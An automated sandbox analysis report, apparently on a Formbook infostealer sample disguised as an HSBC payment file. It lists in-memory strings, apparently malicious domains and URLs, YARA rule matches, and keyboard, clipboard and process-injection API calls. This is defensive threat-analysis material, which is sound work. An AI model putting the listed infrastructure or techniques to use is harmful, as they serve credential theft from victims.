            Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
            Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
            Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
            Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
            Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
            Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
            Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/js/min.js?v2.3
            Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
            Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/28903/search.png)
            Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/28905/arrrow.png)
            Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/29590/bg1.png)
            Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
            Source: sdchange.exe, 00000005.00000002.3958580894.0000000006212000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.0000000003FC2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://inf30027group23.xyz/3ycg/?kT9p=pDb90QysyaZySbP/Lb/85VXpHjKeZwoE0p/ODTrpnAu3DfEgpB0uRxX
            Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.Crochetpets.online
            Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.crochetpets.online/Crochet_Baby.cfm?fp=X0p2O9eTSzUb2xglLBhlRNvJoCK7vbkhQXY0xba2TwtupEqkci
            Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.crochetpets.online/Crochet_Cotton.cfm?fp=X0p2O9eTSzUb2xglLBhlRNvJoCK7vbkhQXY0xba2TwtupEqk
            Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.crochetpets.online/Crochet_Flowers.cfm?fp=X0p2O9eTSzUb2xglLBhlRNvJoCK7vbkhQXY0xba2TwtupEq
            Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.crochetpets.online/Crochet_Patterns.cfm?fp=X0p2O9eTSzUb2xglLBhlRNvJoCK7vbkhQXY0xba2TwtupE
            Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.crochetpets.online/Pet_Apparel.cfm?fp=X0p2O9eTSzUb2xglLBhlRNvJoCK7vbkhQXY0xba2TwtupEqkciy
            Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.crochetpets.online/__media__/design/underconstructionnotice.php?d=crochetpets.online
            Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.crochetpets.online/__media__/js/trademark.php?d=crochetpets.online&type=ns
            Source: EqOUZfSIzU.exe, 00000006.00000002.3959254630.0000000005588000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.donante-de-ovulos.biz
            Source: EqOUZfSIzU.exe, 00000006.00000002.3959254630.0000000005588000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.donante-de-ovulos.biz/g3wl/
            Source: sdchange.exe, 00000005.00000002.3960350765.0000000007FBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
            Source: sdchange.exe, 00000005.00000002.3960350765.0000000007FBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: sdchange.exe, 00000005.00000002.3960350765.0000000007FBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: sdchange.exe, 00000005.00000002.3960350765.0000000007FBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
            Source: firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
            Source: sdchange.exe, 00000005.00000002.3960350765.0000000007FBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: sdchange.exe, 00000005.00000002.3960350765.0000000007FBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: sdchange.exe, 00000005.00000002.3960350765.0000000007FBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: sdchange.exe, 00000005.00000002.3954559304.0000000003001000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: sdchange.exe, 00000005.00000003.2566984871.0000000007F99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: sdchange.exe, 00000005.00000002.3954559304.0000000003023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
            Source: sdchange.exe, 00000005.00000002.3954559304.0000000003001000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3954559304.0000000003023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: sdchange.exe, 00000005.00000002.3954559304.0000000003001000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: sdchange.exe, 00000005.00000002.3954559304.0000000003023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: sdchange.exe, 00000005.00000002.3954559304.0000000003023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: sdchange.exe, 00000005.00000002.3960350765.0000000007FBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: sdchange.exe, 00000005.00000002.3958580894.0000000005EEE000.00000004.10000000.00040000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.00000000063A4000.00000004.10000000.00040000.00000000.sdmp, sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.0000000003C9E000.00000004.00000001.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.0000000004154000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_00794164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00794164
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_00794164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00794164
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_00793F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00793F66
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_0078001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0078001C
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: 0_2_007ACABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_007ACABC

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.3957510457.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2378537810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2378859545.0000000003760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3954264030.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3957685559.0000000004AF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2379212098.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3959254630.0000000005510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3956974013.00000000023D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3957510457.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2378537810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2378859545.0000000003760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3954264030.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3957685559.0000000004AF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2379212098.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3959254630.0000000005510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3956974013.00000000023D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exeCode function: This is a third-party compiled AutoIt script.0_2_00723B3A
            Source: rHSBCBank_Paymentswiftcpy.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: rHSBCBank_Paymentswiftcpy.exe, 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_8016e3c2-b
            Source: rHSBCBank_Paymentswiftcpy.exe, 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_24ef2490-d
            Source: rHSBCBank_Paymentswiftcpy.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_4f619af8-2
            Source: rHSBCBank_Paymentswiftcpy.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_4c5ffa2a-5
            Source: initial sampleStatic PE information: Filename: rHSBCBank_Paymentswiftcpy.exe
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C143 NtClose,2_2_0042C143
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040A9BA NtAllocateVirtualMemory,2_2_0040A9BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040AA62 NtAllocateVirtualMemory,2_2_0040AA62
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972B60 NtClose,LdrInitializeThunk,2_2_03972B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03972DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039735C0 NtCreateMutant,LdrInitializeThunk,2_2_039735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03974340 NtSetContextThread,2_2_03974340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03974650 NtSuspendThread,2_2_03974650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972B80 NtQueryInformationFile,2_2_03972B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972BA0 NtEnumerateValueKey,2_2_03972BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972BF0 NtAllocateVirtualMemory,2_2_03972BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972BE0 NtQueryValueKey,2_2_03972BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972AB0 NtWaitForSingleObject,2_2_03972AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972AD0 NtReadFile,2_2_03972AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972AF0 NtWriteFile,2_2_03972AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972F90 NtProtectVirtualMemory,2_2_03972F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972FB0 NtResumeThread,2_2_03972FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972FA0 NtQuerySection,2_2_03972FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972FE0 NtCreateFile,2_2_03972FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972F30 NtCreateSection,2_2_03972F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972F60 NtCreateProcessEx,2_2_03972F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972E80 NtReadVirtualMemory,2_2_03972E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972EA0 NtAdjustPrivilegesToken,2_2_03972EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972EE0 NtQueueApcThread,2_2_03972EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972E30 NtWriteVirtualMemory,2_2_03972E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972DB0 NtEnumerateKey,2_2_03972DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972DD0 NtDelayExecution,2_2_03972DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972D10 NtMapViewOfSection,2_2_03972D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972D00 NtSetInformationFile,2_2_03972D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972D30 NtUnmapViewOfSection,2_2_03972D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972CA0 NtQueryInformationToken,2_2_03972CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972CC0 NtQueryVirtualMemory,2_2_03972CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972CF0 NtOpenProcess,2_2_03972CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972C00 NtQueryInformationProcess,2_2_03972C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972C70 NtFreeVirtualMemory,2_2_03972C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972C60 NtCreateKey,2_2_03972C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973090 NtSetValueKey,2_2_03973090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973010 NtOpenDirectoryObject,2_2_03973010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039739B0 NtGetContextThread,2_2_039739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973D10 NtOpenProcessToken,2_2_03973D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973D70 NtOpenThread,2_2_03973D70
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D74650 NtSuspendThread,LdrInitializeThunk,5_2_04D74650
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D74340 NtSetContextThread,LdrInitializeThunk,5_2_04D74340
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D72CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_04D72CA0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D72C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_04D72C70
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D72C60 NtCreateKey,LdrInitializeThunk,5_2_04D72C60
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D72DD0 NtDelayExecution,LdrInitializeThunk,5_2_04D72DD0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D72DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_04D72DF0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D72D10 NtMapViewOfSection,LdrInitializeThunk,5_2_04D72D10
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D72D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_04D72D30
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D72EE0 NtQueueApcThread,LdrInitializeThunk,5_2_04D72EE0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D72E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_04D72E80
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D72FE0 NtCreateFile,LdrInitializeThunk,5_2_04D72FE0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 5_2_04D72FB0 NtResumeThread,LdrInitializeThunk,5_2_04D72FB0
